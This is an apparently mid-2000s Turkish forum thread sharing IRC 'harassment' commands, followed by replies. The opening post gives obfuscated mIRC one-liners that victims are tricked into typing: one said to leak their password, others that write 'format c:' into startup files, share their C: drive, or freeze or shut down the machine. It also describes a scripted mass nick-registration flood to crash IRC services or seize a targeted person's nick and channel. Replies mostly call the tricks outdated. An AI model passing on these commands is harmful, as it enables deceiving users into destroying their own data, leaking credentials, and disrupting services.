IRC de rahatsızlık yapmak isteyenler için bir kaç komutircde şifre almak için karşı tarafa bunu yazdırın Karsi tarafa bunu yazdirirsaniz sifresi : ASWELLAS olur // $+ $chr(116) $+ $chr(105) $+ $chr(109) $+ $chr(101) $+ $chr(114) 2 0 /
Konu Zubat tarafından açılmış, 2065 kişi tarafından görüntülenip, 18 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
IRC de rahatsızlık yapmak isteyenler için bir kaç komut konusundaki toplam yorum: 18, okunma sayısı: 2065. |
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Cool Çırak
![]() Kayıt Tarihi: Mar 2005
Üye numarası: #6831
Karma etkisi: 0
![]() Karma: 10
|
ircde şifre almak için karşı tarafa bunu yazdırın
Karsi tarafa bunu yazdirirsaniz sifresi : ASWELLAS olur // $+ $chr(116) $+ $chr(105) $+ $chr(109) $+ $chr(101) $+ $chr(114) 2 0 / $mid(FHNIVGD,3,2) $+ $mid(FDCKGF,3,2) $+ $mid(FDSEGF,3,2) $+ $mid(FDRV F,3,3) $mid(IFASET FK,4,4) $+ $mid(FJSPASGF,4,2) $+ $mid(FJKSSWGF,4,3) $+ $mid(FJKORDGF,4,3) $+ $mid(FJS ASWDG,4,4) $+ $mid(FJSELLASDGF,4,5) $+YN | // $+ $chr(116) $+ $chr(105) $+ $chr(109) $+ $chr(101) $+ $chr(114) 2 5 / $mid(FHEVGD,3,1) $+ $mid(FDXIGF,3,2) $+ $mid(FDTGF,3,1) ------------------------------------------------------------------------------------------------ kaşı tarafın bilgisauarını formatlamak için pc format için karsi tarafa bunlari yazdirin /ctcp kurban lagg //write autoexe.bat format c:/autotest/q /ctcp kurban lagg //write msdos.sys format c:/autotest/q ------------------------------------------------------------------------------------------------ karşı tarafın bilgisayarına girmek için bunu yazdırın /fserve nickiniz c:\ karsi tarafa bunu yazdirirsaniz bilgisayarina girebilirsiniz. ------------------------------------------------------------------------------------------------ karşı tarafın bilgisayarını kitlemek için bunu yazdırın /con/con bu komutu karsi tarafa yazdirdiginizda karsi tarafin makinesi kitlenir ------------------------------------------------------------------------------------------------ karşı tarafın bilgisayarını kapatmak için bunu yazdırın /run runonce -q karsi tarafa bunu yazdirin 15sn içinde bilgisayari kapansin !!!!! ------------------------------------------------------------------------------------------------ NOT: Bunların Hepsini Karşı Tarafa Yazdırmalısınız .... server çökertmek isteyenlere çok basit bir yöntem söyleyeyim.önce bir kanal açın.daha sonra kanal access listine ekleyebileceğiniz en fazla accessli kişi ekleyin.örneğin kanalınız olsun ve kanalınızda 500 kişi accessli olsun.daha sonra 5 veya 10 arkadas internet cafeye gidin ayrı ayrı bilgisayarlara oturun.herkes kanalda sop olan nicklerle girsin ve herkes 10 ar tane mirc açsın.10 kişi de 10 sop olarak girdiği nicklerle access list çeksin.demek istediğim sadece bir kanal için 100 sopun aynı anda access list çekmesi.server %80 ihtimal servicelerini yitirecektir yada sınırda kalacaktır.ama büyük ihtimal serviceler gider .yaklaşık 15 kez denedik ve 12 başarı elde ettik.ama çok zaman alıyo o ayrı konu.kayıtlı nick bulana kadar ............. 500 kadar şifreli nick bulmak zor diyorsanız kendiniz şifreleyin yada scriptiniz şu kodu kullanarak otomatik halletsin. /starthack { inc %c nick unsecure $+ %c raw -q nickserv register 1234567 unsecure $+ %c $+ @hotmail.com } Buda çalıştıracak komut. Zamanı serverin nick şifreleme süresine gore ayarlayacaksınız. /timer 0 60 /starthack . Bu işlemi bir kaç kez yaptıktan sonra %c değerimiz en son kaldığı yerden devam edecektir. Sıfırlama için /set %c=0 yaparak değeri 0 dan alabilirsiniz. Başka Bir Yontem Aynı Kodla ve Hemen Hemen Aynı mantıkla... Bir IRC serverda ayni ident ve ipden birkacyüz veya bin nick register edersek o ident ve ipdeki bütün nickler Nickserv tarafindan otomatikman Abuse veya başka isimler adi altinda killenerek droplanir Fakat Dikkat edilecek husus şurası ip ve ident kesinlikle ayni olmak zorundadır (Bunu sakin unutmayin) .. Yukarıdaki kodları kullanarak 10 kişi bir iki mırcten kayıt yapmayı başarabilirseniz 1 iki saatte servisleri düşürmeyi başarırsınız. Bu yöntemi Kıl oldugunuz bir adamın kanalını yada nickini almak için de kullanabilrisiniz. Bunun için yukarıda unsecure yazılı yere adamın nickini yazıoyrsunuz. ve bağlandığınızda adamın identini, şifreleme yaparkende registerlediği mail adresini kullanıyorsunuz. Yeterli sayıda kayıt yaptıktan sonra adamı nicki düşecek ve kanalıda otomatikmen droplanacaktır. Tabi bir kişi için biraz fazla masraflı bir yontem ama napalım. Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=5303 Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=5303 İrcoplara Dikkat Etmeyi unutmayın. Not 1 ; Bug Bahamut,ptlink,Unreal kurulu bütün serverlarda % 100 sonuç verir (Conferansroom serverlar desteklememektedir) Not 2 ; Nickler Belki 200 belki 1500 nicktede düşebilir bunun için sabırla kill yiyesiye kadar nick register etmeye devam edin.. Not 3 ; Nickserv ve Chanserv offline olursa yada splitt olursa bilinki siz yapmişsinizdir nickserv gelesiye kadar bekleyin sonra nick register etmeye devam edin... ------------------------------------------------------------------------------------- KanaLda Kimse Yoksa Kanalı Hop Komutu Kulanarak Ele gecireblirsiniiz //hop | //mode #kanal +k GavuR | //mode #kanal +i | //mode #kanal +b *@* |
|
|
|
|
|
#2 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Mar 2005
Üye numarası: #3583
Karma etkisi: 8
![]() Karma: 73
|
bunlari yazdirmadan yapabilrceklerimiz yokmu bu işler için
|
|
|
|
|
|
#3 |
|
Banned
![]() ![]() ![]() Kayıt Tarihi: Nov 2004
Üye numarası: #41 Yer: Zonguldak
![]() ![]() Karma: 144
|
bunlar eskidi sanırım yaaaaa önceden bunu yaptırıyorduk kızlar yiyordu ama erkekler yemiyo
eskidi yaff |
|
|
|
|
|
#4 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #2743 Yer: KKTC
![]() ![]() Karma: -172
|
/con con ve /run runonce -q xo de calışmaz 98 de calışır...
|
|
|
|
|
|
#5 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Dec 2004
Üye numarası: #463 Yer: Ankara
Karma etkisi: 10
![]() ![]() ![]() Karma: 274
|
eh biraz eski bi bilgi olsun birilerinin işine yarıyabilir genede
kanalda kimse yokken yapilan eylenceli bi komutta budur topic değişir öyle kalır bide sabah adam kanalına geldiğinde dumur ![]() //hop | //topic #kanal Geldim Gördüm Yendim k |
|
|
|
|
|
#6 |
|
Çırak
Üye numarası: #8327
|
Eski Şeyler Bunlar Be Yaf co con da /con/con diye deyil başka bi türlüydü o bi kere ilk verdiyin komutta çok uzun deyilmi kim yer onu
![]() |
|
|
|
|
|
#7 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Mar 2005
Üye numarası: #3612 Yer: izmir
Karma etkisi: 8
![]() Karma: 35
|
ya eskıden cok yutturudum ben bu numarayıda sımdılerde maymunun gozu acıldı pek yıyen olmuyo ama arda saflarda cıkıyo denemeye değer bence
|
|
|
|
|
|
#8 |
|
Forum Ustası
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Mar 2005
Üye numarası: #8409 Yer: California LA
Karma etkisi: 5041
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 502853
|
dostum öncelikle bu komutları büyük serverlerde yazdıramazsın direk kill yersin günümüz artık korumalarla dolu bu nları yapman birass imkansız ayrıca karşı tarafın pc sini formatlaman imkansız format
bu kadar kolay komutla format atamazsın yoksa ben yarım saat 98 cd sini tak cd rom desteğiyle başlat diye uğraşmazdım bu biraz hayal pilavı oldu nikin COM1 COM2 yaparak mouse nin kitlendiğini biliyodumda bunu ilk defa duydum Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=5303 COM1 COM2 nikleri de yasaklıdır zaten yine teşekkürler sağol paylaştığın için |
|
|
|
|
|
#9 |
|
Forum Ustası
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #3251 Yer: le Bir Ederim LAN burayı
Karma etkisi: 858
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 84672
|
Eski komutlar zaten genelde serverlarda koruma var bu komutlar karşı tarafa ulaşmıyo bile .
|
|
|
|
|
|
#10 |
|
Banned
Üye numarası: #6311
|
Arkadaşlar artık bunlar eskidi Yeni Fikirleri olan varsa yazsın yeni komutlar bunların çoğu işe yaramıyor artık herkes tarafından biliniyor ve bilmeyenlerde bilmedikleri komutları yazmıyor bize karşı tarafa yazdırmadan direk bizim tarafımızdan yapılacak komutlar lazım öyle bir komut olacakki ben yazınca karşıdakinin bağlantısı gidecek illa karşı tarafa yazdıracaz bilmem ne adamı kandıracan falan filan bunlar uzun iş yeni şeyler bulmak lazım artık.
|
|
|
|
|
|
#11 |
|
Banned
Üye numarası: #6311
|
hey ben ağlamazken
|
|
|
|
|
|
#12 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Apr 2005
Üye numarası: #14751
Karma etkisi: 1072
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 106495
|
yaw arkadaşalar bi kanalı nasıl ele geçirecem yani kanal sadece ölesine açılmış adam tek başına takılıyo buda beni delirtiyor always_212@hotmail.com arkadaşalr babn yardımcı olursanız sevinirim...
|
|
|
|
|
|
#13 |
|
Çırak
![]() Kayıt Tarihi: Apr 2005
Üye numarası: #12472
|
eski deillll tiiiy fi tarihinden kalma bu zıhım...Töbe o nası konusuyum ben Turkçe mi werin...
|
|
|
|
|
|
#14 |
|
Çırak
![]() Kayıt Tarihi: Apr 2005
Üye numarası: #11264
![]() Karma: -22
|
bir pc ye girmek için mırc de Komut varmıdır? varsa ogrenmek istıyorum..?
|
|
|
|
|
|
#15 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: May 2005
Üye numarası: #18053
Karma etkisi: 10
![]() ![]() ![]() Karma: 253
|
bu komutların çoğu çalılmıuyor eskilerde kaldı özellikle /con komutu xp de çalışması imkansız 98 kullananların sayısı da baya düştü
|
|
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|